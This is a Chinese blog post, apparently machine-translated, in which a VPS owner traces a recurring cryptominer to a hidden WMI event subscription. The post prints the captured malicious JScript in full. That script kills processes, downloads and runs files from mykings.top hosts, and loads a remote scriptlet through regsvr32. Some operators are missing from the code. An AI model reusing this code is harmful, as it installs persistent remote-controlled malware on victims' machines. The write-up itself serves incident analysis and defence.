| 随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。 我本人在香港购买了非常便宜的VPS,并设置了一个代码托管服务器来存储一些私人代码,并顺便将其用作阶梯。由于某些历史原因,该计算机使用Windows Server2003。在大多数情况下,它只是用作梯子,因此我没有照顾它,所以挂了电话。 某人暂停了采矿任务。文件名为lsmosee.exe。 当我第一次发现问题时,我并没有太在意它。我删除了它,忽略了它。但是几天后,它又弹出了,我又删除了它。真奇怪我懒得手动删除它,安装了一些家用防病毒软件,检查并杀死了一些东西,打了补丁,它似乎稳定了几天,然后又出现了。 
这是一件奇怪的事情。 Google /百度检查了lsmosee。这个东西是采矿的东西,但是没有透露具体的杀戮细节。有人提到重新安装系统,但未给出具体计划。我不小心看到了这件事,并在计划任务中添加了一个启动项。事实证明是这样。我看着它,确实如此。我删除了它。几天后,它又出现了。 因为我太忙了,没有时间去处理它,所以我做了一个任务管理器。每次都固定其名称。因此,我会定期查询当前进程列表,并在遇到它时将其杀死。效果很好,至少不会发生。向上。但是,该机器的防病毒软件继续提示找到了木马,并且隔离区中有很多木马,但我从来没有弄清楚这件事是从哪里来的。 直到这几天,我都看到了WMI脚本(我以前听说过它,但是我还没有研究过它)。 WMI脚本没有物理文件,但是可以存储一些脚本。脚本可以由事件触发然后执行。我马上想到了。问题可能出在这里。 可以肯定的是,通过WMI工具,我发现root \ subscription中有一些多余的内容: 
复制脚本,内容如下(格式已调整): var toff=3000;
var url1 = "http://wmi.mykings.top:8888/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i arr.length; i++)
{
t = arr[i].split(" ");
proc = t[0];
path = t[1];
dele = t[2];
wsh.Run("taskkill /f /im " + proc, 0, true);
if (dele == 0)
{
try
{
fso.DeleteFile(path, true);
}
catch (e) {}
}
};
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext())
{
var p=e.item();
if(p.Caption=="rundll32.exe") p.Terminate()
};
var t2=0;
while(t2-t1toff)
{
var t2=new Date().valueOf()
}
var pp=service.get("Win32_Process");
var url="http://wmi.mykings.top:8888/test.html",
http=new ActiveXObject("Microsoft.XMLHTTP"),
ado=new ActiveXObject("ADODB.Stream"),
wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)
t=arr[i].split(" ",3),
http.open("GET",t[0],!1),
http.send(),
ado.Type=1,
ado.Open(),
ado.Write(http.responseBody),
ado.SaveToFile(t[1],2),
ado.Close(),
1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
============================ 我终于抓到你了。 感情总结: 大多数防病毒软件仅检查并杀死文件和注册表,而没有注意检查和杀死计划的任务和WMI脚本,因此即使删除了木马,仍然会再次受到感染。 无法直观地访问WMI。您需要安装其他工具才能看到它。手动杀死也很容易被忽略。
本文来自本站,转载请注明本文网址:
http://www.pc-fly.com/a/shouji/article-349645-1.html
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
| 
